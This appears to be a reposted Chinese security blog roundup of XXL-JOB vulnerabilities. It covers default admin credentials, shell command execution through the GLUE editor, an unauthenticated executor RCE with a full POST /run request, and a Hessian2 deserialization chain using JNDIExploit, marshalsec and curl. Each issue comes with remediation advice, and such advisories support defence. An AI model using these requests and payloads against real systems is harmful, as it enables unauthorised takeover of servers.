XXL-JOB漏洞汇总
2023-4-2 08:59:52 Author: 我不是Hacker(查看原文) 阅读量:89 收藏

简介

XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。

后台弱口令

路径

http://127.0.0.1:8080/toLoginhttp://127.0.0.1:8080/xxl-job-admin/toLogin

口令

admin/123456

整改建议

设置复杂口令(数字+大小写字母+特殊符号)

后台任务中心任意命令执行

攻击者可以在后台任务调度中心通过写入shell命令任务调度获取服务器权限。

复现

注意运行模式需要为 GLUE(shell)


点击 GLUE IDE编辑脚本


通过dnslog外带命令结果


executor 未授权访问致远程命令执行漏洞

XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。

影响版本

XXL-JOB <= 2.2.0

复现

POST /run HTTP/1.1Host: your-ip:9999Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Connection: closeContent-Type: application/jsonContent-Length: 365
{ "jobId": 1, "executorHandler": "demoJobHandler", "executorParams": "demoJobHandler", "executorBlockStrategy": "COVER_EARLY", "executorTimeout": 0, "logId": 1, "logDateTime": 1586629003729, "glueType": "GLUE_SHELL", "glueSource": "touch /tmp/success", "glueUpdatetime": 1586699003758, "broadcastIndex": 0, "broadcastTotal": 0}

整改建议

针对该问题,现提供几种安全防护策略。

    • 1、开启 XXL-JOB 自带的鉴权组件:官方文档中搜索 “xxl.job.accessToken” ,按照文档说明启用即可。

    • 2、端口防护:及时更换默认的执行器端口,不建议直接将默认的9999端口开放到公网。

    • 3、端口访问限制:通过配置安全组限制只允许指定IP才能访问执行器9999端口。

未授权 Hessian2反序列化

api可以未授权访问
http://127.0.0.1:8080/apihttp://127.0.0.1:8080/xxl-job-admin/api

影响版本

xxl-job <=2.0.2

复现

启动恶意JNDI注入利用服务
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i x.x.x.x -l 1389
利用marshalsec最新版本生成Hessian2这个Gadget来生成payload(这里注意一下高版本JDK的trustURLCodebase,选择对应的payload)
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian2 SpringAbstractBeanFactoryPointcutAdvisor ldap://x.x.x.x:1389/Basic/TomcatEcho > test.ser
发包Go
curl -XPOST -H "Content-Type: x-application/hessian" -H "cmd: whoami" --data-binary @test.ser http://127.0.0.1:8080/api


整改建议

升级最新版;
开启白名单访问。

参考链接

https://xz.aliyun.com/t/11091

扫码加群

公众号新功能可自行探索


文章来源: http://mp.weixin.qq.com/s?__biz=MzkwNDI1NDUwMQ==&mid=2247486425&idx=2&sn=c56daaf7715162058c275a4e94cd86a8&chksm=c0888e93f7ff07856607a99073a2ebdf69aec2f145ade05430b6d9fb60845f7cfc93b3957657#rd
如有侵权请联系:admin#unsafe.sh